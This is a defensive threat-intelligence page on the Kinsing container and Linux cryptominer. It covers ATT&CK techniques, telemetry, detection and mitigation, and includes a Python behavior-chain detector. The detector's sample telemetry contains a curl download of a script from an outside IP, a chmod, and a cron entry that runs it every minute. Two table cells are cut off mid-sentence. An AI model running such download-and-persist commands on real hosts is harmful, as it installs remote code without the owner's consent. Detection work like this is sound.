S0599: Kinsing
Analyst context for executives and security teams
Kinsing matters because it connects cloud-native compromise to direct operational cost: ATT&CK describes it as Golang-based malware for Containers and Linux that runs a cryptocurrency miner and attempts to spread to other hosts. For leaders, this is not just a malware label; it is a validation point for whether container administration, Linux host monitoring, credential hygiene, and cloud compute cost controls can detect and contain unauthorized resource use before it becomes a resilience or spend issue.
Executive priority
Prioritize Kinsing as a control-coverage test for container and Linux environments. The relationship set points to external remote services, valid accounts, brute force, SSH lateral movement, container administration commands, container deployment, credential discovery, tool transfer, web-based command-and-control, persistence through cron, and compute hijacking. Executives should ask whether the organization can prove visibility across container control planes, Linux hosts, SSH authentication, scheduled tasks, outbound web traffic, and abnormal compute consumption. This also supports audit and compliance evidence around privileged access, workload governance, and incident response readiness.
Technical view
ATT&CK does not provide a dedicated detection section for Kinsing, so SOC and detection teams should validate coverage through the related behaviors. Focus on Containers and Linux: unexpected container administration activity, new or unusual container deployments, shell execution, process and file discovery, cron changes, permission changes, inbound or repeated authentication attempts, SSH use between hosts, access using valid accounts, retrieval of external tools, web-protocol command-and-control patterns, access to shell history or private key locations, and sustained high compute usage consistent with compute hijacking. Treat this as a behavior-chain detection problem rather than a single malware signature problem.
Likely telemetry
- Container control-plane audit logs, including Docker daemon, Kubernetes API server, and kubelet activity where applicable
- Linux process execution and command-line telemetry
- Container creation, image/deployment, and exec activity
- SSH authentication logs and lateral SSH session records
- Remote service authentication logs, including failed and successful attempts
Detection direction
- Build detections around combinations of behaviors: container admin command execution followed by shell activity, tool transfer, cron modification, and sustained compute spikes.
- Validate alerting for unusual container deployments or exec activity, especially where it occurs from unexpected users, service accounts, hosts, or external-facing administration paths.
- Tune SSH and remote-service monitoring for brute force patterns, anomalous successful logins, and lateral movement between Linux or container hosts; account for administrative maintenance windows to reduce false positives.
- Correlate credential-access indicators, such as reads of shell history or private key locations, with subsequent SSH, container administration, or external network activity.
- Monitor outbound web traffic from workloads that do not normally initiate external communications; the ATT&CK relationship to Web Protocols supports attention to C2-like web traffic, but local baselining is required.
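The behavior-chain idea above, as an added example (not code from the Glexia page or from MITRE): a minimal per-host correlator that walks constructed container, process, cron and CPU telemetry and reports hosts where container administration is followed, within a window, by tool transfer, cron modification and sustained compute use. The event format, field names, thresholds and sample lines are all assumptions made for this illustration.

```python
# Added example: correlate a Kinsing-style behavior chain per host.
# Event tuple layout, stage names and thresholds are constructed assumptions.
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # chain must complete inside this window
CPU_THRESHOLD = 90.0             # percent; "sustained" = CPU_SAMPLES in a row
CPU_SAMPLES = 3

# Constructed sample telemetry: (timestamp, host, event_type, detail)
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:05", "node-7", "container_exec", "docker exec -it a1b2 /bin/bash"),
    ("2024-05-01T10:00:40", "node-7", "process", "curl -s http://203.0.113.9/x.sh -o /tmp/x.sh"),
    ("2024-05-01T10:01:10", "node-7", "process", "chmod +x /tmp/x.sh"),
    ("2024-05-01T10:01:30", "node-7", "cron_modify", "crontab - (new entry: * * * * * /tmp/x.sh)"),
    ("2024-05-01T10:05:00", "node-7", "cpu_sample", "98"),
    ("2024-05-01T10:10:00", "node-7", "cpu_sample", "97"),
    ("2024-05-01T10:15:00", "node-7", "cpu_sample", "99"),
    ("2024-05-01T11:00:00", "node-3", "container_exec", "docker exec web-1 nginx -s reload"),
    ("2024-05-01T11:30:00", "node-3", "cpu_sample", "35"),
]

def stage_of(event_type, detail):
    """Map a raw event to a chain stage, or None if it is not of interest."""
    if event_type in ("container_exec", "container_deploy"):
        return "container_admin"
    if event_type == "process" and detail.split()[0] in ("curl", "wget"):
        return "tool_transfer"
    if event_type == "cron_modify":
        return "cron_persist"
    return None

def correlate(events):
    """Return {host: [stages seen]} for every host whose chain starts with container admin."""
    by_host = defaultdict(list)
    for ts, host, etype, detail in sorted(events):          # ISO timestamps sort lexically
        by_host[host].append((datetime.fromisoformat(ts), etype, detail))
    findings = {}
    for host, evs in by_host.items():
        start = next((t for t, e, d in evs if stage_of(e, d) == "container_admin"), None)
        if start is None:
            continue
        stages, hot = ["container_admin"], 0
        for t, e, d in evs:
            if t <= start or t - start > WINDOW:
                continue                                     # outside the correlation window
            s = stage_of(e, d)
            if s and s not in stages:
                stages.append(s)
            elif e == "cpu_sample":                          # count consecutive hot samples
                hot = hot + 1 if float(d) >= CPU_THRESHOLD else 0
                if hot >= CPU_SAMPLES and "compute_hijack" not in stages:
                    stages.append("compute_hijack")
        findings[host] = stages
    return findings

def alerts(events, min_stages=3):
    """Only hosts with at least min_stages chained behaviors are worth an alert."""
    return {h: s for h, s in correlate(events).items() if len(s) >= min_stages}
```

A lone `docker exec` on node-3 stays below the alert bar; the routine maintenance exception from the list above is what `min_stages` encodes.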
Mitigation priorities
- Reduce exposed container and remote administration surfaces; review whether container administration services and external remote services are reachable only from approved management paths.
- Strengthen identity controls for Linux, container, and remote-service access, including least privilege, credential rotation, and review of service accounts that can deploy or administer containers.
- Harden SSH and remote access by limiting where it is enabled, enforcing strong authentication, and monitoring both failed and successful access patterns.
- Apply workload governance for container deployment and execution so unauthorized containers, privileged execution, and unexpected administrative commands are restricted or reviewed.
- Protect secrets and private keys by removing insecure storage, limiting file permissions, and monitoring access to common key and shell history locations.
Analyst notes and limits
The most useful defensive framing comes from the ATT&CK relationships rather than from a Kinsing-specific detection paragraph, which is not provided. Kinsing is described by MITRE as malware for Containers and Linux that runs a cryptocurrency miner and attempts to spread. Its related techniques make it relevant to cloud security, managed detection, identity and access management, incident response, and vulnerability/control prioritization for containerized Linux environments.
No official ATT&CK detection guidance, aliases, labels, or tactics are provided for this object. This analysis is therefore limited to the official description, platform fields, external references, and the listed technique relationships. Local architecture, logging configuration, exposed services, workload baselines, and identity model are required to determine actual exposure or detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1083 | File and Directory Discovery | Kinsing has used the find command to search for specific files. [1] |
| Enterprise | T1071.001 | Web Protocols (sub-technique) | Kinsing has communicated with C2 over HTTP. [1] |
| Enterprise | T1610 | Deploy Container | Kinsing was run through a deployed Ubuntu container. [1] |
| Enterprise | T1078 | Valid Accounts | Kinsing has used valid SSH credentials to access remote hosts. [1] |
| Enterprise | T1059.004 | Unix Shell (sub-technique) | Kinsing has used Unix shell scripts to execute commands in the victim environment. [1] |
| Enterprise | T1552.004 | Private Keys (sub-technique) | Kinsing has searched for private keys. [1] |
| Enterprise | T1222.002 | Linux and Mac Permissions (sub-technique) | Kinsing has used chmod to modify permissions on key files for use. [1] |
| Enterprise | T1552.003 | Shell History (sub-technique) | Kinsing has searched |
| Enterprise | T1110 | Brute Force | Kinsing has attempted to brute force hosts over SSH. [1] |
| Enterprise | T1021.004 | SSH (sub-technique) | Kinsing has used SSH for lateral movement. [1] |
| Enterprise | T1018 | Remote System Discovery | Kinsing has used a script to parse files like |
| Enterprise | T1133 | External Remote Services | Kinsing was executed in an Ubuntu container deployed via an open Docker daemon API. [1] |
| Enterprise | T1053.003 | Cron (sub-technique) | Kinsing has used crontab to download and run shell scripts every minute to ensure persistence. [1] |
| Enterprise | T1609 | Container Administration Command | Kinsing was executed with an Ubuntu container entry point that runs shell scripts. [1] |
| Enterprise | T1105 | Ingress Tool Transfer | Kinsing has downloaded additional lateral movement scripts from C2. [1] |
| Enterprise | T1057 | Process Discovery | Kinsing has used ps to list processes. [1] |
| Enterprise | T1496.001 | Compute Hijacking (sub-technique) | Kinsing has created and run a Bitcoin cryptocurrency miner. [1][2] |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | 03e6f5f2ada7… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Aqua Kinsing April 2020: Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.
- [2] Sysdig Kinsing November 2020: Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.
- [3] Aqua Security Cloud Native Threat Report June 2021: Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.
- [4] mitre-attack S0599
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.